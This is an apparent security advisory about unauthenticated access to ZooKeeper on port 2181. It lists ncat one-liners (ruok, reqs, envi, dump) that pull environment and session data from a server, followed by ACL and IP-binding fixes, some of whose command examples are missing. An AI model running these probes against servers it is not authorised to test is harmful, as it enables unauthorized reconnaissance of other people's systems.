Unauthorized Access Vulnerability in ZooKeeper
Vulnerability Description
ZooKeeper is defaulted to open on port 2181 and without any access control, an attacker can gain a large amount of sensitive information about the system, including the system name and Java environment, by executing the envi command.
Environment Setup
The default open port for Zookeeper is 2181.
Vulnerability Exploitation
The following command can be used to remotely retrieve the environment of the server:
stat: Lists statistics about performance and clients connecting.
ruok: Tests if the server is running in a non-error state. echo ruok |ncat 127.0.0.1 2181
reqs: Lists outstanding requests. echo reqs |ncat 127.0.0.1 2181
envi: Prints detailed information about the service environment. echo envi |ncat 127.0.0.1 2181
dump: Lists outstanding sessions and ephemeral nodes. echo dump |ncat 127.0.0.1 2181
Fix Recommendations
Prohibit exposing Zookeeper directly to the public network Add access control, choose the corresponding method according to the situation (authenticated user, username and password)
Bind specified IP access (recommended):
Login to zookeeper
View current permissions:
Add accessible IP
Check if it was added normally
Unauthorized people can also connect, but an error KeeperErrorCode = NoAuth for / will be reported when viewing the node, localhost will not work, and only accessible IP can be accessed.
Rollback method: Access using the IP set before:
Set to be accessible by everyone:
Set up authentication
Configure appropriate access permissions for ZooKeeper.
Add an authentication user addauth digest username:password in plain text
Setting permissions
setAcl /path auth:username:password in clear text:permission
setAcl /path digest:username:password in encrypted form:permission
Viewing Acl settings
Last updated
